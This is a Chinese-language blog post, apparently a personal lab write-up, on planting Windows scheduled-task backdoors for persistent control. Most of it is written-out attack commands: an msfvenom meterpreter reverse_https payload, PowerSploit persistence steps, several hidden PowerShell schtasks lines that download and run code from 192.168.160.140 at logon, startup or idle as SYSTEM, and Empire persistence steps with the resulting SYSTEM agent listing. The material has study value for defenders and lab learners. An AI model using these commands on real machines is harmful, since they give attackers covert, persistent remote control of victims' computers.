许多黑客为了持续控制肉鸡，都会添加计划任务，维护黑客工具的稳定性。不仅仅是黑客，像我在「ailx10：HFish开源蜜罐框架系统」的实践过程中，也用到了计划任务，来保证进程始终存活。「计划任务后门」可以让计算机病毒藏的更持久，就算你找到病毒，把它删掉了，只要重启电脑，计划任务又自动生成的病毒。因此保持计划任务的干净，是每个安全工程师时刻重视的基本职业素养。

ailx10 网络安全优秀回答者

在powershell中模拟计划任务后门没有接收端（不成功）

Powershell版本的Persistence模块，下载地址：github项目 。在这个实验里，首先需要制作一个载荷，也就是计划任务执行的载荷，这里通过下面的命名执行，获得ailx10.ps1文件，放在实验目录c:/study目录下。

msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.160.140 lport=443 -f psh-reflection -o ailx10.ps1

进入主题，首先下载github中的脚本，然后在powershell中加载，运行下面3行命令，获得2个脚本，分别是Persistence.ps1和RemovePersistence.ps1文件。

$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
Add-Persistence -FilePath ./ailx10.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceoption $UserOptions -Verbose

在客户端加载产生的Persistence.ps1脚本，会添加一个计划任务后门，在计算机空闲状态时，会创建一个powershell.exe程序。

schtasks /Create /SC ONIDLE /I 1 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive"

但是书上并没有告诉你，服务端怎么接收这个shell。

在metasploit中模拟「计划任务后门」实验它一样死活不成功啊

服务端：生成的一句话口令，扔到客户端，结果客户端就是不工作～

powershell.exe -nop -w hidden -c $f=new-object net.webclient;$f.proxy=[Net.WebRequest]::GetSystemWebProxy();$f.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $f.downloadstring('http://192.168.160.140:8080/');

客户端：三选一，可以没能见证奇迹的发生，有时候生活就是这样～

• 添加计划任务（用户登陆）

schtasks /create /tn WindowsUpdate /tr "c:windows\system32\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX((new-object net.webclient).downloadstring(''http://192.168.160.140:8080/'''))'" /sc onlogon /ru System

• 添加计划任务（系统启动）

schtasks /create /tn WindowsUpdate /tr "c:windows\system32\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX((new-object net.webclient).downloadstring(''http://192.168.160.140:8080/'''))'" /sc onstart /ru System

• 添加计划任务（系统空闲）

schtasks /create /tn WindowsUpdate /tr "c:windows\system32\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX((new-object net.webclient).downloadstring(''http://192.168.160.140:8080/'''))'" /sc onidle /i 1

2020年9月19日更新：在锤了好几次之后都没有锤爆之后，只能去做下一个实验，然而运气就是这么好，通过empire实验的启发，成功的完成了「计划任务后门」，更加劲爆的还是system 权限～

ailx10：注册表注入后门的简单实验

• 进入模块（usemodule persistence/elevated/schtasks）
• 设置定时任务时间（set DailyTime 17:20）
• 走你（execute）

成功: 成功创建计划任务 "Updater"。
Schtasks persistence established using listener ailx10 stored in
HKLM:\Software\Microsoft\Network\debug with Updater daily trigger at 17:20.

• 等待时间的来临（滴答滴答...）
• 见证奇迹的发生啦～～
• 注意：这里的Username列，带有*说明是超级权限哦～

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 
----     -- -----------     ------------      --------                -------            ---    -----    --------- 
HT1C2UNM ps 192.168.160.128 WIN-D2GN1OUFTMB   *WORKGROUP\SYSTEM       powershell         2980   5/0.0    2020-09-19 17:20:20

本篇完